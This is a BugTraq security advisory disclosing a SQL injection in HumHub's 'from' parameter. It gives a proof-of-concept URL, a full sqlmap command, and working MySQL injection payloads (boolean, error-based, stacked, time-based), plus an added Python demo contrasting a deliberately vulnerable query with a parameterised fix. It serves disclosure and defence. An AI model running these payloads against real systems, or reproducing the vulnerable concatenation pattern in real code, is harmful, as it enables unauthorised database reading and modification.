BugTraq
LSE Leading Security Experts GmbH - LSE-2015-10-14 - HumHub SQL-Injection Nov 30 2015 03:48PM
=== LSE Leading Security Experts GmbH - Security Advisory 2015-10-14 ===

HumHub - SQL-Injection
------------------------------------------------------------------------

Tested Versions
===============
HumHub 0.11.2 and 0.20.0-beta.2

Issue Overview
==============
Vulnerability Type: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Technical Risk: high
Likelihood of Exploitation: high
Vendor: HumHub GmbH & Co. KG
Vendor URL: https://www.humhub.org
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
Advisory URL: https://www.lsexperts.de/advisories/lse-2015-10-14.txt
Advisory Status: Public
CVE-Number: ----
CVE URL: ---

Impact
======
Enables an attacker to read and modify the HumHub MySQL database.

Issue Description
=================
While conducting an internal software evaluation, LSE Leading
Security Experts GmbH discovered that the HumHub social networking
software is vulnerable to SQL injection: the "from" parameter of the
directory stream action is passed into an SQL query without proper
escaping or parameter binding.

Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises blocking
access to the HumHub software until the vendor
provides a patch.

Proof of Concept
================

Opening the following URL (the "from" value is 5'" URL-encoded)

http://localhost/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5%27%22&mode=normal

returns an SQL error, which shows that the value reaches the query
unescaped. The injection point is easily exploitable using sqlmap:

./sqlmap.py -u 'http://localhost:9933/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5&mode=normal' --cookie='pm_getting-started-panel=expanded; pm_new-people-panel=expanded; pm_user-statistics-panel=expanded; pm_new-spaces-panel=expanded; pm_spaces-statistics-panel=expanded; sin=f9vou17vnik100rrr5b26v8ip3; CSRF_TOKEN=d94129bfdd49e5d2c628928228519cd6b2c9cf54' --level=2 --risk=2 -p from -a

...

---
Parameter: from (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=-4670 OR 5804=5804#&mode=normal

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT 7208 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(7208=7208,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=normal

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5;(SELECT * FROM (SELECT(SLEEP(5)))OXGN)#&mode=normal

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT * FROM (SELECT(SLEEP(5)))nBYr)&mode=normal
---
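The query shape that the sqlmap output points at (an untrusted "from" value concatenated into a WHERE clause) and its fix, shown side by side as an added Python example. This is not code from the advisory or from HumHub itself: the table name and columns, the exact query, and the use of an in-memory SQLite database in place of MySQL are all assumptions made for the demonstration. The trailing "#" of the boolean-based payload is dropped because SQLite does not understand MySQL's "#" comment syntax; the rest of the payload behaves the same in both engines.

```python
import re
import sqlite3

# Constructed sample data standing in for HumHub's stream table.
# Schema and query are assumptions; the advisory does not show them.
ROWS = [(i, "public" if i % 2 else "private") for i in range(1, 11)]


def _connect():
    """Fresh in-memory SQLite database holding the constructed table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wall_entry (id INTEGER PRIMARY KEY, visibility TEXT)"
    )
    conn.executemany("INSERT INTO wall_entry VALUES (?, ?)", ROWS)
    return conn


def vulnerable_stream(from_param, limit=4):
    """Assumed vulnerable pattern: the raw GET value is spliced into the SQL
    text, so anything the attacker sends becomes part of the statement."""
    conn = _connect()
    sql = (
        "SELECT id FROM wall_entry WHERE id < " + from_param
        + " ORDER BY id DESC LIMIT " + str(limit)
    )
    return [row[0] for row in conn.execute(sql)]


def hardened_stream(from_param, limit=4):
    """Fix: accept only an integer literal, then bind it as a parameter so the
    driver passes it to the engine as data rather than as SQL text."""
    if not isinstance(from_param, str) or not re.fullmatch(r"-?\d+", from_param):
        raise ValueError("from must be an integer")
    from_id = int(from_param)
    conn = _connect()
    sql = "SELECT id FROM wall_entry WHERE id < ? ORDER BY id DESC LIMIT ?"
    return [row[0] for row in conn.execute(sql, (from_id, limit))]


def probe(func, from_param):
    """Run one handler on one input; return its rows, or the exception name."""
    try:
        return func(from_param)
    except (ValueError, sqlite3.OperationalError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    # The three inputs from the advisory: a benign id, the probe 5'" that
    # produced the SQL error, and sqlmap's boolean-based payload.
    for value in ("5", "5'\"", "-4670 OR 5804=5804"):
        print(repr(value), "vulnerable:", probe(vulnerable_stream, value),
              "hardened:", probe(hardened_stream, value))
```

Against the vulnerable handler the probe value raises a database syntax error (the behaviour the advisory observed) and the boolean payload turns the "id < ..." filter into a tautology, so the attacker sees the newest rows regardless of the id they supplied. The hardened handler rejects both before any SQL is built and behaves identically to the vulnerable one for a legitimate integer. The same integer check, applied to the "from" parameter at a reverse proxy, is a narrower stopgap than blocking the whole application while a patch is pending.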

History
=======
2015-10-14 Issue discovered
2015-10-15 Vendor contacted
2015-10-15 Vendor response and hotfix
2015-10-20 Vendor releases fixed versions
2015-11-30 Advisory release

GPG Signature
=============
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc


Copyright 2010, SecurityFocus